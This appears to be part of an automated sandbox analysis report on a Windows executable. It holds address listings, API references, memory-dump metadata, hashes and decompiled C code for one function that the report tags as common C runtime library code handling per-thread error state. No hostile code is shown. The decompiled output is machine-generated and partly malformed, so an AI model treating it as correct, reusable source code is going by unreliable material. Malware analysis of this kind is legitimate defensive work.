                                                                                                                                                                          0x00a02796
                                                                                                                                                                          0x00a02794
                                                                                                                                                                          0x00a02790
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0254a
                                                                                                                                                                          0x00a0254a
                                                                                                                                                                          0x00a0254f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02555
                                                                                                                                                                          0x00a02555
                                                                                                                                                                          0x00a0255a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02560
                                                                                                                                                                          0x00a02560
                                                                                                                                                                          0x00a02566
                                                                                                                                                                          0x00a0256b
                                                                                                                                                                          0x00a0256d
                                                                                                                                                                          0x00a02574
                                                                                                                                                                          0x00a02575
                                                                                                                                                                          0x00a02577
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0257d
                                                                                                                                                                          0x00a0257d
                                                                                                                                                                          0x00a02581
                                                                                                                                                                          0x00a02587
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0258d
                                                                                                                                                                          0x00a0258f
                                                                                                                                                                          0x00a02590
                                                                                                                                                                          0x00a02593
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02599
                                                                                                                                                                          0x00a02599
                                                                                                                                                                          0x00a0259f
                                                                                                                                                                          0x00a025a4
                                                                                                                                                                          0x00a025ae
                                                                                                                                                                          0x00a025b2
                                                                                                                                                                          0x00a025b7
                                                                                                                                                                          0x00a025ba
                                                                                                                                                                          0x00a025bc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a025be
                                                                                                                                                                          0x00a025be
                                                                                                                                                                          0x00a025c0
                                                                                                                                                                          0x00a025c3
                                                                                                                                                                          0x00a025c3
                                                                                                                                                                          0x00a025c6
                                                                                                                                                                          0x00a025c9
                                                                                                                                                                          0x00a025c9
                                                                                                                                                                          0x00a025d4
                                                                                                                                                                          0x00a025d6
                                                                                                                                                                          0x00a025d8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a025d8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a025da
                                                                                                                                                                          0x00a025da
                                                                                                                                                                          0x00a025e0
                                                                                                                                                                          0x00a025e3
                                                                                                                                                                          0x00a025e3
                                                                                                                                                                          0x00a025f1
                                                                                                                                                                          0x00a025fa
                                                                                                                                                                          0x00a025ff
                                                                                                                                                                          0x00a02605
                                                                                                                                                                          0x00a02608
                                                                                                                                                                          0x00a02609
                                                                                                                                                                          0x00a0260b
                                                                                                                                                                          0x00a02619
                                                                                                                                                                          0x00a02619
                                                                                                                                                                          0x00a02620
                                                                                                                                                                          0x00a02681
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02622
                                                                                                                                                                          0x00a02622
                                                                                                                                                                          0x00a02630
                                                                                                                                                                          0x00a02635
                                                                                                                                                                          0x00a02638
                                                                                                                                                                          0x00a0263a
                                                                                                                                                                          0x00a027b5
                                                                                                                                                                          0x00a027b7
                                                                                                                                                                          0x00a027b8
                                                                                                                                                                          0x00a027b9
                                                                                                                                                                          0x00a027ba
                                                                                                                                                                          0x00a027bb
                                                                                                                                                                          0x00a027bc
                                                                                                                                                                          0x00a027c1
                                                                                                                                                                          0x00a027c4
                                                                                                                                                                          0x00a027c5
                                                                                                                                                                          0x00a027cd
                                                                                                                                                                          0x00a027d4
                                                                                                                                                                          0x00a027d7
                                                                                                                                                                          0x00a027d8
                                                                                                                                                                          0x00a027db
                                                                                                                                                                          0x00a027df
                                                                                                                                                                          0x00a027e0
                                                                                                                                                                          0x00a027e3
                                                                                                                                                                          0x00a027f3
                                                                                                                                                                          0x00a02816
                                                                                                                                                                          0x00a0281b
                                                                                                                                                                          0x00a0281e
                                                                                                                                                                          0x00a02820
                                                                                                                                                                          0x00a02ad6
                                                                                                                                                                          0x00a02ad6
                                                                                                                                                                          0x00a02ad6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02826
                                                                                                                                                                          0x00a02826
                                                                                                                                                                          0x00a02829
                                                                                                                                                                          0x00a02829
                                                                                                                                                                          0x00a0282c
                                                                                                                                                                          0x00a02832
                                                                                                                                                                          0x00a02838
                                                                                                                                                                          0x00a0283b
                                                                                                                                                                          0x00a0283d
                                                                                                                                                                          0x00a02840
                                                                                                                                                                          0x00a02847
                                                                                                                                                                          0x00a0284a
                                                                                                                                                                          0x00a02850
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02852
                                                                                                                                                                          0x00a02856
                                                                                                                                                                          0x00a0287f
                                                                                                                                                                          0x00a0287f
                                                                                                                                                                          0x00a02858
                                                                                                                                                                          0x00a02858
                                                                                                                                                                          0x00a0285c
                                                                                                                                                                          0x00a02860
                                                                                                                                                                          0x00a02867
                                                                                                                                                                          0x00a0286d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0286f
                                                                                                                                                                          0x00a0286f
                                                                                                                                                                          0x00a02872
                                                                                                                                                                          0x00a02875
                                                                                                                                                                          0x00a0287d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0287d
                                                                                                                                                                          0x00a0286d
                                                                                                                                                                          0x00a0288c
                                                                                                                                                                          0x00a0288c
                                                                                                                                                                          0x00a0288e
                                                                                                                                                                          0x00a02897
                                                                                                                                                                          0x00a0289d
                                                                                                                                                                          0x00a028a0
                                                                                                                                                                          0x00a028a0
                                                                                                                                                                          0x00a028a3
                                                                                                                                                                          0x00a028a6
                                                                                                                                                                          0x00a028a6
                                                                                                                                                                          0x00a028b6
                                                                                                                                                                          0x00a028c4
                                                                                                                                                                          0x00a028c9
                                                                                                                                                                          0x00a028d0
                                                                                                                                                                          0x00a028d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a028d8
                                                                                                                                                                          0x00a028de
                                                                                                                                                                          0x00a028eb
                                                                                                                                                                          0x00a028f4
                                                                                                                                                                          0x00a028fa
                                                                                                                                                                          0x00a02907
                                                                                                                                                                          0x00a0290e
                                                                                                                                                                          0x00a02913
                                                                                                                                                                          0x00a02916
                                                                                                                                                                          0x00a02918
                                                                                                                                                                          0x00a02b56
                                                                                                                                                                          0x00a02b5c
                                                                                                                                                                          0x00a02b5d
                                                                                                                                                                          0x00a02b5e
                                                                                                                                                                          0x00a02b5f
                                                                                                                                                                          0x00a02b60
                                                                                                                                                                          0x00a02b61
                                                                                                                                                                          0x00a02b66
                                                                                                                                                                          0x00a02b69
                                                                                                                                                                          0x00a02b6c
                                                                                                                                                                          0x00a02b6d
                                                                                                                                                                          0x00a02b7f
                                                                                                                                                                          0x00a02b84
                                                                                                                                                                          0x00a02b86
                                                                                                                                                                          0x00a02b8f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02b8f
                                                                                                                                                                          0x00a02b88
                                                                                                                                                                          0x00a02b8b
                                                                                                                                                                          0x00a02b8d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02b95
                                                                                                                                                                          0x00a0291e
                                                                                                                                                                          0x00a0291e
                                                                                                                                                                          0x00a0292c
                                                                                                                                                                          0x00a0292f
                                                                                                                                                                          0x00a02945
                                                                                                                                                                          0x00a0294c
                                                                                                                                                                          0x00a02951
                                                                                                                                                                          0x00a02931
                                                                                                                                                                          0x00a02931
                                                                                                                                                                          0x00a02939
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0293b
                                                                                                                                                                          0x00a0293b
                                                                                                                                                                          0x00a02941
                                                                                                                                                                          0x00a02941
                                                                                                                                                                          0x00a02939
                                                                                                                                                                          0x00a02958
                                                                                                                                                                          0x00a0295f
                                                                                                                                                                          0x00a02962
                                                                                                                                                                          0x00a02a60
                                                                                                                                                                          0x00a02a63
                                                                                                                                                                          0x00a02a70
                                                                                                                                                                          0x00a02a73
                                                                                                                                                                          0x00a02a7b
                                                                                                                                                                          0x00a02a7b
                                                                                                                                                                          0x00a02a65
                                                                                                                                                                          0x00a02a6b
                                                                                                                                                                          0x00a02a6b
                                                                                                                                                                          0x00a02968
                                                                                                                                                                          0x00a02968
                                                                                                                                                                          0x00a02974
                                                                                                                                                                          0x00a0297a
                                                                                                                                                                          0x00a02980
                                                                                                                                                                          0x00a02983
                                                                                                                                                                          0x00a02989
                                                                                                                                                                          0x00a0298c
                                                                                                                                                                          0x00a0298f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02991
                                                                                                                                                                          0x00a0299a
                                                                                                                                                                          0x00a0299e
                                                                                                                                                                          0x00a029a7
                                                                                                                                                                          0x00a029ab
                                                                                                                                                                          0x00a029ac
                                                                                                                                                                          0x00a029b2
                                                                                                                                                                          0x00a029b8
                                                                                                                                                                          0x00a029be
                                                                                                                                                                          0x00a029c1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a029c3
                                                                                                                                                                          0x00a029e2
                                                                                                                                                                          0x00a029e2
                                                                                                                                                                          0x00a029e5
                                                                                                                                                                          0x00a02a02
                                                                                                                                                                          0x00a02a07
                                                                                                                                                                          0x00a02a0a
                                                                                                                                                                          0x00a02a0c
                                                                                                                                                                          0x00a02a4a
                                                                                                                                                                          0x00a02a0e
                                                                                                                                                                          0x00a02a0e
                                                                                                                                                                          0x00a02a14
                                                                                                                                                                          0x00a02a19
                                                                                                                                                                          0x00a02a21
                                                                                                                                                                          0x00a02a22
                                                                                                                                                                          0x00a02a22
                                                                                                                                                                          0x00a02a39
                                                                                                                                                                          0x00a02a40
                                                                                                                                                                          0x00a02a43
                                                                                                                                                                          0x00a02a45
                                                                                                                                                                          0x00a02a45
                                                                                                                                                                          0x00a02a50
                                                                                                                                                                          0x00a02a56
                                                                                                                                                                          0x00a02a56
                                                                                                                                                                          0x00a02a5b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02a5b
                                                                                                                                                                          0x00a029c5
                                                                                                                                                                          0x00a029c7
                                                                                                                                                                          0x00a029cc
                                                                                                                                                                          0x00a029d2
                                                                                                                                                                          0x00a029db
                                                                                                                                                                          0x00a029de
                                                                                                                                                                          0x00a029de
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a029c7
                                                                                                                                                                          0x00a02a7e
                                                                                                                                                                          0x00a02a7e
                                                                                                                                                                          0x00a02a82
                                                                                                                                                                          0x00a02a8a
                                                                                                                                                                          0x00a02a90
                                                                                                                                                                          0x00a02a93
                                                                                                                                                                          0x00a02a99
                                                                                                                                                                          0x00a02a9b
                                                                                                                                                                          0x00a02ae7
                                                                                                                                                                          0x00a02aed
                                                                                                                                                                          0x00a02b39
                                                                                                                                                                          0x00a02b39
                                                                                                                                                                          0x00a02aef
                                                                                                                                                                          0x00a02af4
                                                                                                                                                                          0x00a02af4
                                                                                                                                                                          0x00a02afa
                                                                                                                                                                          0x00a02afe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02b00
                                                                                                                                                                          0x00a02b04
                                                                                                                                                                          0x00a02b0d
                                                                                                                                                                          0x00a02b19
                                                                                                                                                                          0x00a02b1e
                                                                                                                                                                          0x00a02b27
                                                                                                                                                                          0x00a02b2d
                                                                                                                                                                          0x00a02b30
                                                                                                                                                                          0x00a02b30
                                                                                                                                                                          0x00a02afe
                                                                                                                                                                          0x00a02b3f
                                                                                                                                                                          0x00a02b47
                                                                                                                                                                          0x00a02b4d
                                                                                                                                                                          0x00a02b50
                                                                                                                                                                          0x00a02a9d
                                                                                                                                                                          0x00a02aa3
                                                                                                                                                                          0x00a02aad
                                                                                                                                                                          0x00a02abf
                                                                                                                                                                          0x00a02ac6
                                                                                                                                                                          0x00a02ad3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02ad3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02a9b
                                                                                                                                                                          0x00a02918
                                                                                                                                                                          0x00a02890
                                                                                                                                                                          0x00a02890
                                                                                                                                                                          0x00a02ad8
                                                                                                                                                                          0x00a02adb
                                                                                                                                                                          0x00a02adc
                                                                                                                                                                          0x00a02add
                                                                                                                                                                          0x00a02adf
                                                                                                                                                                          0x00a02ae6
                                                                                                                                                                          0x00a02ae6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0288e
                                                                                                                                                                          0x00a02887
                                                                                                                                                                          0x00a02889
                                                                                                                                                                          0x00a02889
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02889
                                                                                                                                                                          0x00a02640
                                                                                                                                                                          0x00a02640
                                                                                                                                                                          0x00a02643
                                                                                                                                                                          0x00a02648
                                                                                                                                                                          0x00a027b0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0264e
                                                                                                                                                                          0x00a02650
                                                                                                                                                                          0x00a02658
                                                                                                                                                                          0x00a0265e
                                                                                                                                                                          0x00a0265f
                                                                                                                                                                          0x00a02665
                                                                                                                                                                          0x00a02666
                                                                                                                                                                          0x00a0266b
                                                                                                                                                                          0x00a02671
                                                                                                                                                                          0x00a02674
                                                                                                                                                                          0x00a02676
                                                                                                                                                                          0x00a02678
                                                                                                                                                                          0x00a02679
                                                                                                                                                                          0x00a02679
                                                                                                                                                                          0x00a02687
                                                                                                                                                                          0x00a02687
                                                                                                                                                                          0x00a0268a
                                                                                                                                                                          0x00a0268d
                                                                                                                                                                          0x00a0268f
                                                                                                                                                                          0x00a02692
                                                                                                                                                                          0x00a02694
                                                                                                                                                                          0x00a02694
                                                                                                                                                                          0x00a02697
                                                                                                                                                                          0x00a02697
                                                                                                                                                                          0x00a0269a
                                                                                                                                                                          0x00a0269d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a026a3
                                                                                                                                                                          0x00a026a3
                                                                                                                                                                          0x00a026a5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a026a5
                                                                                                                                                                          0x00a0269d
                                                                                                                                                                          0x00a02648
                                                                                                                                                                          0x00a0263a
                                                                                                                                                                          0x00a0260d
                                                                                                                                                                          0x00a0260f
                                                                                                                                                                          0x00a02610
                                                                                                                                                                          0x00a02613
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02613
                                                                                                                                                                          0x00a0260b
                                                                                                                                                                          0x00a02593
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02587
                                                                                                                                                                          0x00a026ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a026ab
                                                                                                                                                                          0x00a0255a
                                                                                                                                                                          0x00a0254f
                                                                                                                                                                          0x00a02544
                                                                                                                                                                          0x00a024fd
                                                                                                                                                                          0x00a024fd
                                                                                                                                                                          0x00a024ff
                                                                                                                                                                          0x00a02516
                                                                                                                                                                          0x00a02501
                                                                                                                                                                          0x00a02501
                                                                                                                                                                          0x00a02502
                                                                                                                                                                          0x00a02503
                                                                                                                                                                          0x00a02504
                                                                                                                                                                          0x00a02509
                                                                                                                                                                          0x00a027a1
                                                                                                                                                                          0x00a027a4
                                                                                                                                                                          0x00a027a5
                                                                                                                                                                          0x00a027a6
                                                                                                                                                                          0x00a027a8
                                                                                                                                                                          0x00a027af
                                                                                                                                                                          0x00a027af
                                                                                                                                                                          0x00a024fb
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A04E1F: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,009F9867,00000002,00000000,?,?,?,009F1D1E,00000001,00000004), ref: 00A04E51
                                                                                                                                                                          • _free.LIBCMT ref: 00A02446
                                                                                                                                                                          • _free.LIBCMT ref: 00A0245D
                                                                                                                                                                          • _free.LIBCMT ref: 00A0247A
                                                                                                                                                                          • _free.LIBCMT ref: 00A02495
                                                                                                                                                                          • _free.LIBCMT ref: 00A024AC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3033488037-0
                                                                                                                                                                          • Opcode ID: fbfde390c5c3a18dc91527db6b4dc9657cc7c382c9f3486e8e6a41f47d272df6
                                                                                                                                                                          • Instruction ID: 70d69b8e7fe2aba4e3da1eee4e9744f5708da3006df0c8f8358399b9ea9b4992
                                                                                                                                                                          • Opcode Fuzzy Hash: fbfde390c5c3a18dc91527db6b4dc9657cc7c382c9f3486e8e6a41f47d272df6
                                                                                                                                                                          • Instruction Fuzzy Hash: 8451D271A00308AFDB21DF69EC85B6A77F4FF58720B144569E949DB2D0E736E941CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A041D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 497 a041d0-a041e5 GetLastError 498 a04203-a04206 call a064f7 497->498 499 a041e7-a041f1 call a064b8 497->499 503 a0420b-a0420d 498->503 504 a041f3-a041f6 499->504 505 a041fe 499->505 506 a041f8 503->506 507 a0420f-a04221 call a04422 503->507 504->506 508 a04270 504->508 505->498 509 a041fa-a041fc 506->509 515 a04223-a04231 call a064f7 507->515 516 a0423a-a04248 call a064f7 507->516 511 a04272-a0427f SetLastError 508->511 509->511 513 a04281-a04286 511->513 514 a04287-a0428c call a007e9 511->514 523 a04232-a04238 call a0447f 515->523 524 a0424a-a04259 call a064f7 516->524 525 a0425b-a0426d call a03ffe call a0447f 516->525 523->509 524->523 525->508
                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                          			E00A041D0(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xa44d20; // 0x2
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00A064F7(__eflags, _t2, 0xffffffff); // executed
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00A04422(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00A064F7(__eflags,  *0xa44d20, _t51);
							if(__eflags != 0) {
								E00A03FFE(_t51, 0xa46524);
								E00A0447F(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00A064F7(__eflags,  *0xa44d20, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00A064F7(0,  *0xa44d20, 0);
							_push(0);
							L9:
							E00A0447F();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00A064B8(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xa44d20; // 0x2
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00A007E9(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xa44d20; // 0x2
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00A064F7(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00A04422(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00A064F7(__eflags,  *0xa44d20, _t60);
								if(__eflags != 0) {
									E00A03FFE(_t60, 0xa46524);
									E00A0447F(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00A064F7(__eflags,  *0xa44d20, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00A064F7(__eflags,  *0xa44d20, _t20);
								_push(_t60);
								L25:
								E00A0447F();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00A064B8(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xa44d20; // 0x2
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00A007E9(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xa44d20; // 0x2
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00A064F7(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00A04422(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00A064F7(__eflags,  *0xa44d20, _t54);
											if(__eflags != 0) {
												E00A03FFE(_t54, 0xa46524);
												E00A0447F(0);
												goto L45;
											} else {
												_t40 = 0;
												E00A064F7(__eflags,  *0xa44d20, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00A064F7(0,  *0xa44d20, 0);
											_push(0);
											L41:
											E00A0447F();
											goto L36;
										}
									}
								} else {
									_t54 = E00A064B8(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xa44d20; // 0x2
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}























                                                                                                                                                                          0x00a041d0
                                                                                                                                                                          0x00a041d0
                                                                                                                                                                          0x00a041db
                                                                                                                                                                          0x00a041dd
                                                                                                                                                                          0x00a041e2
                                                                                                                                                                          0x00a041e5
                                                                                                                                                                          0x00a04203
                                                                                                                                                                          0x00a04206
                                                                                                                                                                          0x00a0420b
                                                                                                                                                                          0x00a0420d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0420f
                                                                                                                                                                          0x00a0421b
                                                                                                                                                                          0x00a0421e
                                                                                                                                                                          0x00a0421f
                                                                                                                                                                          0x00a04221
                                                                                                                                                                          0x00a04246
                                                                                                                                                                          0x00a04248
                                                                                                                                                                          0x00a04261
                                                                                                                                                                          0x00a04268
                                                                                                                                                                          0x00a0426d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0424a
                                                                                                                                                                          0x00a0424a
                                                                                                                                                                          0x00a04253
                                                                                                                                                                          0x00a04258
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04258
                                                                                                                                                                          0x00a04223
                                                                                                                                                                          0x00a04223
                                                                                                                                                                          0x00a04223
                                                                                                                                                                          0x00a0422c
                                                                                                                                                                          0x00a04231
                                                                                                                                                                          0x00a04232
                                                                                                                                                                          0x00a04232
                                                                                                                                                                          0x00a04237
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04237
                                                                                                                                                                          0x00a04221
                                                                                                                                                                          0x00a041e7
                                                                                                                                                                          0x00a041ed
                                                                                                                                                                          0x00a041f1
                                                                                                                                                                          0x00a041fe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a041f3
                                                                                                                                                                          0x00a041f6
                                                                                                                                                                          0x00a04270
                                                                                                                                                                          0x00a04270
                                                                                                                                                                          0x00a041f8
                                                                                                                                                                          0x00a041f8
                                                                                                                                                                          0x00a041f8
                                                                                                                                                                          0x00a041fa
                                                                                                                                                                          0x00a041fa
                                                                                                                                                                          0x00a041fa
                                                                                                                                                                          0x00a041f6
                                                                                                                                                                          0x00a041f1
                                                                                                                                                                          0x00a04273
                                                                                                                                                                          0x00a0427b
                                                                                                                                                                          0x00a0427d
                                                                                                                                                                          0x00a0427f
                                                                                                                                                                          0x00a04287
                                                                                                                                                                          0x00a0428c
                                                                                                                                                                          0x00a0428d
                                                                                                                                                                          0x00a04292
                                                                                                                                                                          0x00a04293
                                                                                                                                                                          0x00a04296
                                                                                                                                                                          0x00a042b0
                                                                                                                                                                          0x00a042b3
                                                                                                                                                                          0x00a042b8
                                                                                                                                                                          0x00a042ba
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a042bc
                                                                                                                                                                          0x00a042c8
                                                                                                                                                                          0x00a042cb
                                                                                                                                                                          0x00a042cc
                                                                                                                                                                          0x00a042ce
                                                                                                                                                                          0x00a042f1
                                                                                                                                                                          0x00a042f3
                                                                                                                                                                          0x00a0430a
                                                                                                                                                                          0x00a04311
                                                                                                                                                                          0x00a04316
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a042f5
                                                                                                                                                                          0x00a042fc
                                                                                                                                                                          0x00a04301
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04301
                                                                                                                                                                          0x00a042d0
                                                                                                                                                                          0x00a042d7
                                                                                                                                                                          0x00a042dc
                                                                                                                                                                          0x00a042dd
                                                                                                                                                                          0x00a042dd
                                                                                                                                                                          0x00a042e2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a042e2
                                                                                                                                                                          0x00a042ce
                                                                                                                                                                          0x00a04298
                                                                                                                                                                          0x00a0429e
                                                                                                                                                                          0x00a042a0
                                                                                                                                                                          0x00a042a2
                                                                                                                                                                          0x00a042ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a042a4
                                                                                                                                                                          0x00a042a4
                                                                                                                                                                          0x00a042a7
                                                                                                                                                                          0x00a04321
                                                                                                                                                                          0x00a04321
                                                                                                                                                                          0x00a04326
                                                                                                                                                                          0x00a04329
                                                                                                                                                                          0x00a0432a
                                                                                                                                                                          0x00a0432b
                                                                                                                                                                          0x00a04332
                                                                                                                                                                          0x00a04334
                                                                                                                                                                          0x00a04339
                                                                                                                                                                          0x00a0433c
                                                                                                                                                                          0x00a0435a
                                                                                                                                                                          0x00a0435d
                                                                                                                                                                          0x00a04362
                                                                                                                                                                          0x00a04364
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04366
                                                                                                                                                                          0x00a04372
                                                                                                                                                                          0x00a04376
                                                                                                                                                                          0x00a04378
                                                                                                                                                                          0x00a0439d
                                                                                                                                                                          0x00a0439f
                                                                                                                                                                          0x00a043b8
                                                                                                                                                                          0x00a043bf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a043a1
                                                                                                                                                                          0x00a043a1
                                                                                                                                                                          0x00a043aa
                                                                                                                                                                          0x00a043af
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a043af
                                                                                                                                                                          0x00a0437a
                                                                                                                                                                          0x00a0437a
                                                                                                                                                                          0x00a0437a
                                                                                                                                                                          0x00a04383
                                                                                                                                                                          0x00a04388
                                                                                                                                                                          0x00a04389
                                                                                                                                                                          0x00a04389
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0438e
                                                                                                                                                                          0x00a04378
                                                                                                                                                                          0x00a0433e
                                                                                                                                                                          0x00a04344
                                                                                                                                                                          0x00a04346
                                                                                                                                                                          0x00a04348
                                                                                                                                                                          0x00a04355
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0434a
                                                                                                                                                                          0x00a0434a
                                                                                                                                                                          0x00a0434d
                                                                                                                                                                          0x00a043c7
                                                                                                                                                                          0x00a043c7
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a04351
                                                                                                                                                                          0x00a04351
                                                                                                                                                                          0x00a04351
                                                                                                                                                                          0x00a0434d
                                                                                                                                                                          0x00a04348
                                                                                                                                                                          0x00a043ca
                                                                                                                                                                          0x00a043d2
                                                                                                                                                                          0x00a043d4
                                                                                                                                                                          0x00a043d4
                                                                                                                                                                          0x00a043db
                                                                                                                                                                          0x00a042a9
                                                                                                                                                                          0x00a04319
